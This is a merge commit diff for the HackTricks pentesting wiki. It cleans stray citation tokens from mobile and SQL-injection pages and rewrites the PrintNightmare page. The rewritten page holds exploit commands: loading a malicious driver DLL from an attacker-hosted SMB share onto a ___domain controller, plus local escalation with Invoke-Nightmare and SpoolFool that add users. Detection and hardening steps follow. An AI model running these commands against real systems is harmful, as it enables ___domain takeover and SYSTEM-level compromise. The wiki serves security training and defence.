Merge pull request #1105 from HackTricks-wiki/research_update_src_windows-hardening_active-directory-methodology_printnightmare_20250712_082222

Research Update Enhanced src/windows-hardening/active-direct...

Author: carlospolop

src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md

@@ -61,15 +61,15 @@ Java.perform(function () {
   });
 });
 ```
-Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  citeturn5search2turn5search0
+Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  
 
 ---
 
 ### Recent vulnerabilities worth hunting for in APKs
 
 | Year | CVE | Affected library | Notes |
 |------|-----|------------------|-------|
-|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0|
+|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
 |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
 
 When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
@@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their
 
 ### References
 
-- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  citeturn5search0
-- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0
+- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  
+- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) 
 
 {{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md

@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest

src/pentesting-web/sql-injection/ms-access-sql-injection.md

@@ -141,7 +141,7 @@ Point the UNC path to:
 * a host that drops the TCP handshake after `SYN-ACK`
 * a firewall sinkhole
 
-The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
+The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. 
 
 ### Other Interesting functions
 
@@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
 * Block outbound SMB/WebDAV at the network boundary.
 * Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
 
-The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
+The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. 
 
 ### .mdb Password Cracker
 

src/windows-hardening/active-directory-methodology/printnightmare.md

@@ -1,10 +1,106 @@
-# PrintNightmare
+# PrintNightmare (Windows Print Spooler RCE/LPE)
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check this awesome blog post about PrintNightmare in 2024: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)**
+> PrintNightmare is the collective name given to a family of vulnerabilities in the Windows **Print Spooler** service that allow **arbitrary code execution as SYSTEM** and, when the spooler is reachable over RPC, **remote code execution (RCE) on ___domain controllers and file servers**. The most-widely exploited CVEs are **CVE-2021-1675** (initially classed as LPE) and **CVE-2021-34527** (full RCE). Subsequent issues such as **CVE-2021-34481 (“Point & Print”)** and **CVE-2022-21999 (“SpoolFool”)** prove that the attack surface is still far from closed.
 
-{{#include ../../banners/hacktricks-training.md}}
+---
+
+## 1. Vulnerable components & CVEs
+
+| Year | CVE | Short name | Primitive | Notes |
+|------|-----|------------|-----------|-------|
+|2021|CVE-2021-1675|“PrintNightmare #1”|LPE|Patched in June 2021 CU but bypassed by CVE-2021-34527|
+|2021|CVE-2021-34527|“PrintNightmare”|RCE/LPE|AddPrinterDriverEx allows authenticated users to load a driver DLL from a remote share|
+|2021|CVE-2021-34481|“Point & Print”|LPE|Unsigned driver installation by non-admin users|
+|2022|CVE-2022-21999|“SpoolFool”|LPE|Arbitrary directory creation → DLL planting – works after 2021 patches|
+
+All of them abuse one of the **MS-RPRN / MS-PAR RPC methods** (`RpcAddPrinterDriver`, `RpcAddPrinterDriverEx`, `RpcAsyncAddPrinterDriver`) or trust relationships inside **Point & Print**.
+
+## 2. Exploitation techniques
+
+### 2.1 Remote Domain Controller compromise (CVE-2021-34527)
+
+An authenticated but **non-privileged** ___domain user can run arbitrary DLLs as **NT AUTHORITY\SYSTEM** on a remote spooler (often the DC) by:
+
+```powershell
+# 1. Host malicious driver DLL on a share the victim can reach
+impacket-smbserver share ./evil_driver/ -smb2support
+
+# 2. Use a PoC to call RpcAddPrinterDriverEx
+python3 CVE-2021-1675.py victim_DC.___domain.local  'DOMAIN/user:Password!' \
+       -f \
+       '\\attacker_IP\share\evil.dll'
+```
+
+Popular PoCs include **CVE-2021-1675.py** (Python/Impacket), **SharpPrintNightmare.exe** (C#) and Benjamin Delpy’s `misc::printnightmare / lsa::addsid` modules in **mimikatz**.
+
+### 2.2 Local privilege escalation (any supported Windows, 2021-2024)
+
+The same API can be called **locally** to load a driver from `C:\Windows\System32\spool\drivers\x64\3\` and achieve SYSTEM privileges:
+
+```powershell
+Import-Module .\Invoke-Nightmare.ps1
+Invoke-Nightmare -NewUser hacker -NewPassword P@ssw0rd!
+```
+
+### 2.3 SpoolFool (CVE-2022-21999) – bypassing 2021 fixes
+
+Microsoft’s 2021 patches blocked remote driver loading but **did not harden directory permissions**. SpoolFool abuses the `SpoolDirectory` parameter to create an arbitrary directory under `C:\Windows\System32\spool\drivers\`, drops a payload DLL, and forces the spooler to load it:
 
+```powershell
+# Binary version (local exploit)
+SpoolFool.exe -dll add_user.dll
+
+# PowerShell wrapper
+Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll
+```
+
+> The exploit works on fully-patched Windows 7 → Windows 11 and Server 2012R2 → 2022 before February 2022 updates 
+
+---
+
+## 3. Detection & hunting
+
+* **Event Logs** – enable the *Microsoft-Windows-PrintService/Operational* and *Admin* channels and watch for **Event ID 808** “The print spooler failed to load a plug-in module” or for **RpcAddPrinterDriverEx** messages.
+* **Sysmon** – `Event ID 7` (Image loaded) or `11/23` (File write/delete) inside `C:\Windows\System32\spool\drivers\*` when the parent process is **spoolsv.exe**.
+* **Process lineage** – alerts whenever **spoolsv.exe** spawns `cmd.exe`, `rundll32.exe`, PowerShell or any unsigned binary .
+
+## 4. Mitigation & hardening
+
+1. **Patch!** – Apply the latest cumulative update on every Windows host that has the Print Spooler service installed.
+2. **Disable the spooler where it is not required**, especially on Domain Controllers:
+   ```powershell
+   Stop-Service Spooler -Force
+   Set-Service Spooler -StartupType Disabled
+   ```
+3. **Block remote connections** while still allowing local printing – Group Policy: `Computer Configuration → Administrative Templates → Printers → Allow Print Spooler to accept client connections = Disabled`.
+4. **Restrict Point & Print** so only administrators can add drivers by setting the registry value:
+   ```cmd
+   reg add "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" \
+           /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 1 /f
+   ```
+   Detailed guidance in Microsoft KB5005652 
+
+---
+
+## 5. Related research / tools
+
+* [mimikatz `printnightmare`](https://github.com/gentilkiwi/mimikatz/tree/master/modules) modules  
+* SharpPrintNightmare (C#) / Invoke-Nightmare (PowerShell)  
+* SpoolFool exploit & write-up  
+* 0patch micropatches for SpoolFool and other spooler bugs  
+
+---
+
+**More reading (external):** Check the 2024 walk-through blog post – [Understanding PrintNightmare Vulnerability](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)
+
+{{#include ../../banners/hacktricks-training.md}}
 
+## References
 
+* Microsoft – *KB5005652: Manage new Point & Print default driver installation behavior*  
+  <https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>
+* Oliver Lyak – *SpoolFool: CVE-2022-21999*  
+  <https://github.com/ly4k/SpoolFool>
+{{#include /banners/hacktricks-training.md}}